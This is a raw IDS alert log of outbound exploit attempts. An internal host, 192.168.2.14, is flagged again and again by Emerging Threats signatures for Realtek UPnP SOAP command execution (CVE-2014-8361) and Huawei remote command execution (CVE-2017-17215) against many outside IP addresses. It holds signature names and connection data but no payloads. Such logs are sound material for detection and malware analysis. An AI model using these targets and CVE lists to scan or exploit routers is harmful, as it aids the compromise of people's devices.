                                                07/20/24-23:06:15.755429TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4730452869192.168.2.14143.160.225.122
                                                07/20/24-23:05:36.327720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703637215192.168.2.14157.120.132.160
                                                07/20/24-23:05:48.763322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034837215192.168.2.1441.109.217.191
                                                07/20/24-23:06:00.139140TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3534852869192.168.2.14194.142.88.245
                                                07/20/24-23:05:44.227636TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5874852869192.168.2.1461.189.27.68
                                                07/20/24-23:05:42.143657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4888037215192.168.2.14197.196.210.118
                                                07/20/24-23:06:13.733520TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613941852869192.168.2.1499.220.176.209
                                                07/20/24-23:05:33.861088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5482237215192.168.2.14157.180.0.116
                                                07/20/24-23:05:48.795527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351637215192.168.2.14197.227.66.253
                                                07/20/24-23:05:56.058256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110837215192.168.2.14157.160.8.34
                                                07/20/24-23:05:40.451363TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3791452869192.168.2.14105.239.125.24
                                                07/20/24-23:07:25.713951TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614189252869192.168.2.14166.254.209.162
                                                07/20/24-23:05:40.426800TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4289252869192.168.2.1492.201.144.62
                                                07/20/24-23:05:58.242242TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24782452869192.168.2.14194.186.6.67
                                                07/20/24-23:05:40.353037TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4394252869192.168.2.1490.16.174.124
                                                07/20/24-23:05:58.867091TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614697252869192.168.2.1490.130.53.27
                                                07/20/24-23:05:45.389146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3997837215192.168.2.1460.223.161.219
                                                07/20/24-23:05:36.328888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897437215192.168.2.14157.129.248.161
                                                07/20/24-23:05:45.817171TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613382252869192.168.2.1475.62.163.102
                                                07/20/24-23:05:35.744805TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615233252869192.168.2.14212.239.177.163
                                                07/20/24-23:06:03.378832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5331837215192.168.2.14197.254.127.131
                                                07/20/24-23:06:01.631607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3761452869192.168.2.14219.82.29.79
                                                07/20/24-23:06:02.517784TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25253852869192.168.2.14126.33.182.99
                                                07/20/24-23:05:52.460913TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5585052869192.168.2.1473.182.112.4
                                                07/20/24-23:05:57.164213TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3748452869192.168.2.14203.188.134.128
                                                07/20/24-23:06:38.067768TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23861652869192.168.2.1418.183.102.66
                                                07/20/24-23:06:26.037863TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4183852869192.168.2.1440.170.192.203
                                                07/20/24-23:06:55.239442TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613450652869192.168.2.1497.21.167.55
                                                07/20/24-23:07:03.123324TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23696052869192.168.2.14132.191.29.38
                                                07/20/24-23:06:45.997240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3689652869192.168.2.1491.117.19.22
                                                07/20/24-23:05:36.532921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5672237215192.168.2.14157.110.219.252
                                                07/20/24-23:05:35.614585TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613992852869192.168.2.1470.251.155.61
                                                07/20/24-23:06:06.437928TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5954452869192.168.2.14180.41.161.208
                                                07/20/24-23:06:38.067768TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24497052869192.168.2.14126.180.229.141
                                                07/20/24-23:05:36.510827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519237215192.168.2.1441.14.10.85
                                                07/20/24-23:05:36.534811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4506037215192.168.2.14197.52.98.160
                                                07/20/24-23:05:58.913916TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24832252869192.168.2.1496.70.6.41
                                                07/20/24-23:05:37.524062TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4923652869192.168.2.14155.49.251.8
                                                07/20/24-23:05:58.066315TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5202652869192.168.2.14130.56.1.95
                                                07/20/24-23:06:03.718240TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614010852869192.168.2.1484.62.152.144
                                                07/20/24-23:05:39.496981TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615384052869192.168.2.1436.253.231.32
                                                07/20/24-23:06:55.227510TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5200052869192.168.2.14182.114.119.16
                                                07/20/24-23:05:57.820676TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615886652869192.168.2.14191.41.212.93
                                                07/20/24-23:05:59.260697TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615335852869192.168.2.14142.64.187.253
                                                07/20/24-23:06:15.773602TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25786252869192.168.2.1451.62.238.64
                                                07/20/24-23:05:56.361407TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613835052869192.168.2.14139.86.116.40
                                                07/20/24-23:06:01.876678TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3620452869192.168.2.1483.37.163.73
                                                07/20/24-23:05:57.587244TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613534652869192.168.2.1495.105.177.126
                                                07/20/24-23:05:40.488770TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6002452869192.168.2.1442.188.126.193
                                                07/20/24-23:05:57.960840TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614981052869192.168.2.14179.72.247.135
                                                07/20/24-23:06:34.148721TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24771652869192.168.2.1468.185.233.236
                                                07/20/24-23:05:52.537891TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5832852869192.168.2.14189.210.242.78
                                                07/20/24-23:05:57.166360TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615825852869192.168.2.14112.83.97.45
                                                07/20/24-23:06:13.663932TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616041652869192.168.2.14204.180.211.11
                                                07/20/24-23:05:33.852858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415837215192.168.2.1441.28.13.220
                                                07/20/24-23:05:36.005292TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5323852869192.168.2.14141.231.43.221
                                                07/20/24-23:05:37.470289TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4267852869192.168.2.14107.226.165.86
                                                07/20/24-23:05:48.783693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4441837215192.168.2.1441.211.169.118
                                                07/20/24-23:05:37.524062TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24199252869192.168.2.14163.170.37.61
                                                07/20/24-23:05:58.963945TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24286252869192.168.2.14136.6.40.211
                                                07/20/24-23:06:58.157771TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4198852869192.168.2.14149.218.131.156
                                                07/20/24-23:06:09.587283TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5769852869192.168.2.14222.190.96.116
                                                07/20/24-23:05:58.700908TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3480252869192.168.2.14216.40.228.188
                                                07/20/24-23:05:33.859779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357437215192.168.2.14157.42.169.126
                                                07/20/24-23:06:06.640556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6040252869192.168.2.14151.106.207.115
                                                07/20/24-23:05:34.622609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5630237215192.168.2.14198.45.18.250
                                                07/20/24-23:06:09.547041TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5437852869192.168.2.1413.186.96.233
                                                07/20/24-23:06:11.301636TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5375252869192.168.2.14207.238.106.184
                                                07/20/24-23:05:36.577316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5713237215192.168.2.14162.94.214.105
                                                07/20/24-23:05:50.555898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4132437215192.168.2.1441.14.1.112
                                                07/20/24-23:05:46.822853TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614241852869192.168.2.14139.219.69.26
                                                07/20/24-23:05:50.576749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3922837215192.168.2.1447.141.173.62
                                                07/20/24-23:07:03.123324TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23505452869192.168.2.1425.34.210.225
                                                07/20/24-23:05:57.123864TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23915852869192.168.2.14139.86.116.40
                                                07/20/24-23:05:38.957923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239237215192.168.2.1441.129.116.189
                                                07/20/24-23:05:58.849532TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5174252869192.168.2.14174.132.14.103
                                                07/20/24-23:06:01.997543TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613602852869192.168.2.1448.95.62.86
                                                07/20/24-23:06:11.328787TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5582252869192.168.2.14120.21.248.106
                                                07/20/24-23:05:37.591367TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4605052869192.168.2.1423.55.138.59
                                                07/20/24-23:06:18.534267TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3825452869192.168.2.14175.8.39.110
                                                07/20/24-23:06:14.126981TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5750652869192.168.2.1485.210.44.216
                                                07/20/24-23:05:37.493635TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25312252869192.168.2.1464.61.239.79
                                                07/20/24-23:05:45.414465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943837215192.168.2.1441.183.144.39
                                                07/20/24-23:06:09.485916TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3894452869192.168.2.14184.148.131.220
                                                07/20/24-23:06:11.221707TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25129852869192.168.2.14115.182.22.138
                                                07/20/24-23:05:37.440953TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23578252869192.168.2.1441.109.181.54
                                                07/20/24-23:05:35.210083TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614644452869192.168.2.1457.131.227.3
                                                07/20/24-23:06:19.865859TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3333452869192.168.2.14147.144.124.143
                                                07/20/24-23:05:57.123864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3915852869192.168.2.14139.86.116.40
                                                07/20/24-23:05:36.592874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5301837215192.168.2.1486.52.82.145
                                                07/20/24-23:05:40.355766TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5779252869192.168.2.14166.95.201.236
                                                07/20/24-23:06:52.775382TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4987252869192.168.2.14144.112.88.196
                                                07/20/24-23:06:01.482595TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3696652869192.168.2.14168.223.81.132
                                                07/20/24-23:06:19.603798TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24249852869192.168.2.14150.31.127.80
                                                07/20/24-23:06:09.547041TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25437852869192.168.2.1413.186.96.233
                                                07/20/24-23:05:35.589736TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5576452869192.168.2.14199.202.13.130
                                                07/20/24-23:05:59.096689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3858252869192.168.2.14102.137.240.137
                                                07/20/24-23:06:02.606013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4014452869192.168.2.1447.168.17.153
                                                07/20/24-23:06:06.595669TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4790052869192.168.2.14168.156.209.183
                                                07/20/24-23:06:29.960598TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4494652869192.168.2.14133.103.255.70
                                                07/20/24-23:06:00.257590TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23461252869192.168.2.1478.127.105.181
                                                07/20/24-23:05:35.905406TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615411652869192.168.2.14180.106.180.212
                                                07/20/24-23:05:37.454500TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4478452869192.168.2.1436.164.151.170
                                                07/20/24-23:05:39.678174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5700037215192.168.2.1467.103.255.211
                                                07/20/24-23:05:40.433285TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25206452869192.168.2.1424.4.155.46
                                                07/20/24-23:06:02.432404TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24070652869192.168.2.14176.29.173.73
                                                07/20/24-23:06:27.692046TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3741452869192.168.2.14144.116.63.138
                                                07/20/24-23:06:02.427717TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4083652869192.168.2.1431.89.98.146
                                                07/20/24-23:05:40.342828TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4582852869192.168.2.14108.67.27.88
                                                07/20/24-23:06:14.536716TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3906852869192.168.2.142.90.110.47
                                                07/20/24-23:05:50.533759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4210637215192.168.2.1441.247.25.60
                                                07/20/24-23:06:07.862885TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615159852869192.168.2.145.53.15.23
                                                07/20/24-23:06:24.853073TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614328852869192.168.2.14117.253.38.147
                                                07/20/24-23:07:03.257276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5552452869192.168.2.14107.84.65.143
                                                07/20/24-23:05:45.392754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4651037215192.168.2.1441.218.148.135
                                                07/20/24-23:05:36.325662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4437837215192.168.2.14197.16.212.149
                                                07/20/24-23:06:25.391346TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614367252869192.168.2.1432.33.117.34
                                                07/20/24-23:05:59.361832TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615761052869192.168.2.14191.54.159.112
                                                07/20/24-23:05:40.483612TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24057652869192.168.2.1464.129.250.95
                                                07/20/24-23:06:01.485669TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5086052869192.168.2.1435.138.240.228
                                                07/20/24-23:05:35.909217TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5307252869192.168.2.1473.174.204.179
                                                07/20/24-23:05:57.417957TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25522252869192.168.2.14222.37.53.103
                                                07/20/24-23:06:16.055924TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24661252869192.168.2.14190.92.200.248
                                                07/20/24-23:06:17.581336TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613586852869192.168.2.1493.176.111.22
                                                07/20/24-23:05:37.450149TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3350852869192.168.2.14183.119.35.244
                                                07/20/24-23:05:38.409616TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4044452869192.168.2.1431.43.154.194
                                                07/20/24-23:05:40.342828TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24582852869192.168.2.14108.67.27.88
                                                07/20/24-23:06:23.248398TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4606852869192.168.2.1444.44.140.237
                                                07/20/24-23:05:42.131789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4927637215192.168.2.1441.169.68.169
                                                07/20/24-23:05:44.364513TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26017252869192.168.2.14205.187.149.67
                                                07/20/24-23:05:42.245741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4050837215192.168.2.14157.223.29.42
                                                07/20/24-23:06:19.930679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4304852869192.168.2.1423.188.123.27
                                                07/20/24-23:05:57.865744TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3403452869192.168.2.14191.34.113.0
                                                07/20/24-23:05:48.800446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3280037215192.168.2.14157.227.1.219
                                                07/20/24-23:05:58.818180TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613623652869192.168.2.1493.193.36.93
                                                07/20/24-23:05:36.295378TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615419852869192.168.2.14107.117.108.202
                                                07/20/24-23:06:04.458817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5772452869192.168.2.14152.17.67.73
                                                07/20/24-23:05:39.612058TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615417052869192.168.2.1473.43.58.179
                                                07/20/24-23:05:46.438139TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4776252869192.168.2.14131.30.152.0
                                                07/20/24-23:05:38.027779TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615292652869192.168.2.14125.85.162.236
                                                07/20/24-23:05:52.468125TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24051452869192.168.2.1475.112.155.168
                                                07/20/24-23:05:44.992160TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613902652869192.168.2.14218.180.53.12
                                                07/20/24-23:05:57.939285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3632052869192.168.2.1497.170.235.212
                                                07/20/24-23:05:34.657123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755237215192.168.2.1441.45.136.104
                                                07/20/24-23:05:35.931996TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616076252869192.168.2.1449.132.116.240
                                                07/20/24-23:05:52.542864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5207252869192.168.2.1465.189.243.195
                                                07/20/24-23:05:37.524062TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25850852869192.168.2.14220.224.214.129
                                                07/20/24-23:05:47.342078TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614316652869192.168.2.14165.53.50.40
                                                07/20/24-23:05:47.530339TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615002852869192.168.2.1464.214.151.9
                                                07/20/24-23:06:42.331305TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3682252869192.168.2.14179.77.221.202
                                                07/20/24-23:05:50.576749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3395837215192.168.2.1470.79.186.162
                                                07/20/24-23:06:05.685689TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615851452869192.168.2.14149.27.20.44
                                                07/20/24-23:05:33.857328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939637215192.168.2.1441.248.125.74
                                                07/20/24-23:05:45.287494TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5546252869192.168.2.1448.13.21.145
                                                07/20/24-23:05:33.830272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000837215192.168.2.14133.28.220.100
                                                07/20/24-23:05:35.310648TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613535652869192.168.2.14184.126.92.19
                                                07/20/24-23:06:02.427717TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5972852869192.168.2.1457.97.23.2
                                                07/20/24-23:07:04.643171TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5460652869192.168.2.14197.171.226.89
                                                07/20/24-23:05:39.765891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860237215192.168.2.1441.140.8.70
                                                07/20/24-23:05:57.526744TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25273052869192.168.2.1413.101.20.178
                                                07/20/24-23:06:01.613195TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615420252869192.168.2.1412.167.125.66
                                                07/20/24-23:07:03.190387TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24499852869192.168.2.1499.193.81.64
                                                07/20/24-23:05:59.247850TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3439452869192.168.2.1496.223.224.178
                                                07/20/24-23:05:59.262794TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613656852869192.168.2.14223.25.114.136
                                                07/20/24-23:05:57.702332TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613633452869192.168.2.1482.141.157.248
                                                07/20/24-23:05:56.881095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5656452869192.168.2.14160.180.47.240
                                                07/20/24-23:06:17.529212TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5350652869192.168.2.1480.157.57.98
                                                07/20/24-23:05:55.889998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4490637215192.168.2.14157.154.38.199
                                                07/20/24-23:05:58.247483TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615070652869192.168.2.14108.229.127.235
                                                07/20/24-23:06:51.585302TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615110452869192.168.2.14163.16.179.111
                                                07/20/24-23:05:48.795527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061037215192.168.2.14157.73.158.138
                                                07/20/24-23:06:12.589035TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3503252869192.168.2.14216.31.102.228
                                                07/20/24-23:06:17.536919TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615885852869192.168.2.14125.137.244.94
                                                07/20/24-23:07:06.736138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4965237215192.168.2.14157.232.5.252
                                                07/20/24-23:05:47.958429TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613364052869192.168.2.14194.214.58.142
                                                07/20/24-23:06:20.610603TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614360452869192.168.2.14120.26.14.0
                                                07/20/24-23:06:00.055828TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5138252869192.168.2.1432.213.57.170
